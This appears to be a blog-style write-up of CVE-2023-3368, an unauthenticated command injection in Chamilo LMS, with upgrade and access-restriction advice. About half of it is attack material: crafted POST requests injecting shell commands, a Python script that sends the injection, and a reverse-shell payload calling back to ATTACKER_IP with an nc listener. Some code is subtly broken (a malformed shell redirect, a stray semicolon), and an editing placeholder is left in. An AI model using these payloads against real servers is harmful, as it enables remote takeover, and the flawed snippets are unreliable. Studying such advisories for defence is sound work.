Chamilo LMS is a popular, open-source learning management system (LMS) used by educational institutions worldwide. In June 2023, a severe security flaw—CVE-2023-3368—was discovered. This vulnerability allows unauthenticated attackers to execute commands on the Chamilo server. It impacts all Chamilo installations up to and including version 1.11.20.
Even more alarming: CVE-2023-3368 is a bypass of a previous Chamilo vulnerability: CVE-2023-34960. That means fixes for the old issue did not sufficiently address the root cause, and another vector for attack remained open.
The Technical Details
At its heart, CVE-2023-3368 is a classic command injection flaw. It’s caused by improper handling (“neutralization”) of user-controlled input in the file:
/main/webservices/additional_webservices.php
Attackers can send a specially crafted request to this endpoint. Because Chamilo doesn’t sanitize some parameters properly, attackers can inject and run system commands on the server without logging in.
The vulnerable code ends up passing unsanitized user data to PHP’s exec() or similar functions, which allows arbitrary commands to run with the web server's privileges.
Suppose the web service endpoint expects an action and some parameters like this
POST /main/webservices/additional_webservices.php HTTP/1.1
Host: chamilo.example.com
Content-Type: application/x-www-form-urlencoded
action=anyaction&user=admin;id
By injecting a semicolon ;, attackers break out of the intended command and append their own.
Let’s try a real command injection. Here’s a payload to make the server run id (which prints user information on Unix systems):
POST /main/webservices/additional_webservices.php HTTP/1.1
Host: chamilo.example.com
Content-Type: application/x-www-form-urlencoded
action=whatever&lang=fr_FR;id
This Python code sends the attack to a vulnerable Chamilo server and prints the response
import requests
url = "http://chamilo.example.com/main/webservices/additional_webservices.php";
malicious_payload = {
"action": "activate_language",
"lang": "fr_FR;id", # injects the 'id' command
}
response = requests.post(url, data=malicious_payload)
print(response.text)
If the command executes, the server will return the output of id.
3. Getting a Reverse Shell
Attackers can escalate the exploit by spawning a remote shell. Here’s a sample payload for a Linux reverse shell:
reverse_shell = "fr_FR;bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 >&1'"
payload = {
"action": "activate_language",
"lang": reverse_shell,
}
requests.post(url, data=payload)
The attacker just needs a listener on port 4444 (nc -lvnp 4444) to catch the shell!
Why Did CVE-2023-34960’s Fix Fail?
The Chamilo team originally patched CVE-2023-34960, but the fix only blocked one specific input vector. The same dangerous code pattern existed elsewhere, and attackers just shifted to a new parameter, bypassing the old patch.
CVE-2023-3368 demonstrates why it’s critical to systematically sanitize every input—especially when input influences system commands.
Reference Links & Further Reading
- NVD entry for CVE-2023-3368
- Exploit Database: Chamilo LMS 1.11.20 - Remote Command Execution (Unauthenticated) (CVE-2023-3368)
- Official Chamilo Github
- Patch discussion on CVE-2023-34960 *(replace with specific commit if available)*
Upgrade Immediately
Chamilo has released version 1.11.22 and later, which fix this issue. Upgrade as soon as possible.
Restrict Web Access
Limit access to the /main/webservices/ directory to only trusted IPs if possible.
Conclusion
CVE-2023-3368 is a serious, easily-exploitable remote command injection flaw in Chamilo LMS. It doesn't require a login and can hand full control to attackers. If your Chamilo is still on v1.11.20 or below, it’s a sitting duck.
Timeline
Published on: 11/28/2023 07:15:41 UTC
Last modified on: 12/04/2023 18:57:35 UTC